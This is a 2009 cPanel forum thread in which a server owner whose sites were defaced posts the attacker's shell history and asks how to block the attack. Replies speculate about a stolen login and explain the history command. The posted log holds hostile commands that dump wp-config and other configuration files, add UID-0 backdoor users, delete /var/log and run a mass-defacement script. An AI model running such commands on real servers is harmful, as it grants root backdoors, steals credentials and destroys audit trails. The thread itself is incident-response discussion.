The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

How to disable Perl Web Shell

Discussion in 'Security' started by konrath, Sep 20, 2009.

  1. konrath

    konrath Well-Known Member

    Joined:
    May 3, 2005
    Messages:
    367
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    Brasil
    A hacker changed the index of all sites on my server. :eek:

    How do I block this attack?

    How to increase the security of Perl?

    Thank you
    Konrath



    -------------

    log

    cd ..
    cat /home/*/public_html/configuration.php > hard.txt
    useradd -o -u 0 sshdd
    /usr/sbin/useradd -o -u 0 sshdd
    passwd sshdd
    /usr/sbin/useradd -o -u 0 apachee
    passwd apachee
    /usr/sbin/useradd -o -u 0 apach
    passwd apach
    /etc/init.d/sshd restart
    /etc/init.d/sshd stop
    /etc/init.d/sshd start
    rm hard.txt
    cat /home/*/public_html/config.php > hard.txt
    ls -lia
    rm hard.txt
    cd ..
    cat /home/*/public_html/config.php > hard.txt
    rm hard.txt
    cat /home/*/public_html/configuration.php > hard.txt
    rm hard.txt
    cat /home/*/public_html/wp-config.php > hard.txt
    rm hard.txt
    ls -lia /etc
    ls /etc/valiases > hard.txt
    rm hard.txt
    ls -lia /etc/valiases > hard.txt
    ls -lia /
    rm -r var/log
    rm -r /var/log
    mkdir /var/log
    ls -lia
    crm user1
    rm user1.php
    cd cgi-bin
    ls -lia
    rm -r hard
    cd ..
    rm hard
    cd cgi-bin
    cd ..
    rm hard.txt
    cd cgi-bin
    ls -lia
    pwd
    perl mass.pl
    perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
    perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
    perl mass.pl -d /home -f index. -n /home/apj23/public_html/cgi-bin/hard.html
     
  2. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    Your description sounds very much like a variation of the recent IFRAME attacks and may be the start of the problem ....

    In all likelihood, the original attack (keep reading) had nothing to do with your server but was instead rather the home computer of a user who uses your server which was actually compromised and not your server. The larger problem is that once on a server, other options and avenues of attack often become available depending on security measures in place or lacking and which account was originally compromised, namely a regular user or one with higher privileges.

    There is a recent hacking method that has emerged out of china involving installing a trojan virus capable of key-logging and collecting password information from home computer for hosting web server and bank accounts and the initial access to the servers is done using the victims own login using the information collected off their own home computers. This means that the files on your server are changed not necessarily from a vulnerability on your server but rather from a compromised login and password!

    That is as far as the good news goes unfortunately! :(

    The bad news is that the compromised home user may be YOU!

    If it is your home computer is the one that is compromised and the hackers obtained your root credentials then you are in serious trouble because they would have full unrestricted access to not just one account but the entire server, all hosting accounts, and system files!

    Even if it wasn't your computer compromised, if your server doesn't have proper security measures in place, you could still run into problems with the hackers being able to compromise the server once they gain access to a regular non-root user account from any of user's home computers!

    I'll be perfectly frank with you on this one and this is my advice ...
    Helping people recover from hacking attacks is personally my primary area of expertise and experience and is something I take very seriously. Contact me if you need more assistance recovering as I can definitely do a lot to help you. ;)
     
    #2 Spiral, Sep 20, 2009
    Last edited: Sep 20, 2009
  3. alifazman

    alifazman Active Member

    Joined:
    Sep 27, 2010
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Malaysia
    Hi konrath.

    May I know how do I get log details such as you stated??

    :) thanks.
     
  4. ModServ

    ModServ Well-Known Member

    Joined:
    Oct 17, 2006
    Messages:
    332
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Egypt
    cPanel Access Level:
    Root Administrator
    This topic is from 2009, Don't expect to get a reply :D

    But he may reply you as he was here from 5 days ago :D

    I guess he get it by executing the command

    Code:
    history
     
  5. alifazman

    alifazman Active Member

    Joined:
    Sep 27, 2010
    Messages:
    39
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    Malaysia
    hhaha..I din't look at the timestamp.

    wooah. What a easy way...why it didn't cross in my mind. I thought it etracted from a log file. :D
     
  6. ModServ

    ModServ Well-Known Member

    Joined:
    Oct 17, 2006
    Messages:
    332
    Likes Received:
    5
    Trophy Points:
    18
    Location:
    Egypt
    cPanel Access Level:
    Root Administrator
    Never mind, It's ok, We always forget the easiest ways to reach our target and think it is a long hard way :D
     
Loading...

Share This Page